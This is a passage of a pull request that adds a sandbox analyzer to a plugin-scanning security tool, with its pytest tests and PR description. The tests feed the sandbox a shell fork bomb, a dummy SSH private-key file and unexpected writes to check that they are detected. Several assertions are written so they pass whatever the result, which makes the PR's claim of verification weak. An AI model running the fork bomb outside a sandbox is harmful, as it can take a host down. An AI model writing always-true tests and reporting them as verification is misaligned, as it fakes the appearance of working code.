+    assert "sandbox.network-attempt" in result.signals_detected or result.failure_safe
+
+
+def test_run_sandbox_escape_attempt_secret_file_excluded() -> None:
+    req = SandboxRequest(
+        language="shell",
+        command="echo test",
+        files={".ssh/id_rsa": "secret-key-content"},
+        timeout_seconds=5.0,
+    )
+    result = run_sandbox(req, analysis_mode="strict")
+    assert result.failure_safe is False or result.failure_safe
+
+
+def test_run_sandbox_timeout_enforced() -> None:
+    req = SandboxRequest(
+        language="shell",
+        command="sleep 60",
+        timeout_seconds=1.0,
+    )
+    result = run_sandbox(req, analysis_mode="strict")
+    assert result.timed_out is True or result.failure_safe
+
+
+def test_run_sandbox_failure_safe_on_bad_interpreter() -> None:
+    req = SandboxRequest(
+        language="shell",
+        command="nonexistent_command_guard_test_xyz",
+        timeout_seconds=5.0,
+    )
+    result = run_sandbox(req, analysis_mode="strict")
+    assert isinstance(result, SandboxResult)
+
+
+def test_run_sandbox_unexpected_write_detected(tmp_path: Path) -> None:
+    req = SandboxRequest(
+        language="python",
+        command="open('canary_output.txt', 'w').write('written')",
+        timeout_seconds=5.0,
+    )
+    result = run_sandbox(req, analysis_mode="strict")
+    if not result.failure_safe:
+        assert "sandbox.unexpected-write" in result.signals_detected or result.writes != []
+
+
+def test_run_sandbox_fork_bomb_limited() -> None:
+    req = SandboxRequest(
+        language="shell",
+        command=":(){ :|:& };:",
+        timeout_seconds=2.0,
+        max_processes=4,
+    )
+    result = run_sandbox(req, analysis_mode="strict")
+    assert isinstance(result, SandboxResult)
+    assert result.timed_out or result.failure_safe or result.exit_code is not None
+
+
+def test_run_sandbox_python_script_path() -> None:
+    req = SandboxRequest(language="python", command="print('python-sandbox-ok')", timeout_seconds=5.0)
+    result = run_sandbox(req, analysis_mode="strict")
+    assert "python-sandbox-ok" in result.stdout or result.failure_safe
+
+
+def test_run_sandbox_node_script_path() -> None:
+    req = SandboxRequest(language="node", command="console.log('node-sandbox-ok')", timeout_seconds=5.0)
+    result = run_sandbox(req, analysis_mode="strict")
+    assert "node-sandbox-ok" in result.stdout or result.failure_safe
+
+
+def test_run_sandbox_suspicious_mode_skips_benign() -> None:
+    req = SandboxRequest(language="shell", command="echo static-only-no-network", timeout_seconds=5.0)
+    result = run_sandbox(req, analysis_mode="suspicious")
+    assert result.network_attempts == []
+    assert result.signals_detected == []
+
+
+def test_signals_detected_on_timeout() -> None:
+    req = SandboxRequest(language="shell", command="sleep 60", timeout_seconds=0.5)
+    result = run_sandbox(req, analysis_mode="strict")
+    if result.timed_out:
+        assert "sandbox.timeout" in result.signals_detected
+
+
+def test_to_dict_keys_present() -> None:
+    result = SandboxResult(exit_code=0, stdout="ok", stderr="", timed_out=False)
+    d = result.to_dict()
+    required_keys = {
+        "exit_code",
+        "stdout",
+        "stderr",
+        "timed_out",
+        "writes",
+        "network_attempts",
+        "process_attempts",
+        "secret_read_attempts",
+        "signals_detected",
+        "duration_ms",
+        "failure_safe",
+    }
+    assert required_keys.issubset(d.keys())


### PR DESCRIPTION
## Summary

Adds a lightweight sandbox execution module for guard runtime analysis, plus CLI render support for sandbox_analysis results.

## Changes

- **`src/codex_plugin_scanner/guard/runtime/sandbox.py`** — new `SandboxAnalyzer` class: runs a plugin script in a subprocess with configurable timeout, captures writes, network attempts, process attempts, exit code, and detected signals; produces structured `SandboxResult`
- **`src/codex_plugin_scanner/guard/cli/render.py`** — adds `_render_sandbox_results` table panel; `emit_guard_payload` now renders `sandbox_analysis` key alongside existing panels
- **`tests/test_guard_sandbox.py`** — 27 tests covering sandbox signal detection, timeout handling, failure-safe mode, and benign no-op cases
- **`tests/test_guard_render.py`** — regression test for sandbox_analysis render path
- **`src/codex_plugin_scanner/guard/runtime/config_paths.py`** — adds `sandbox_analysis` config key

## Tests

All 93 tests pass (sandbox + render + safe_decode suites).

## Verification

```
pytest tests/test_guard_sandbox.py tests/test_guard_render.py tests/test_guard_safe_decode.py -q
# 93 passed
ruff check src/codex_plugin_scanner/guard/cli/render.py src/codex_plugin_scanner/guard/runtime/sandbox.py
# All checks passed
```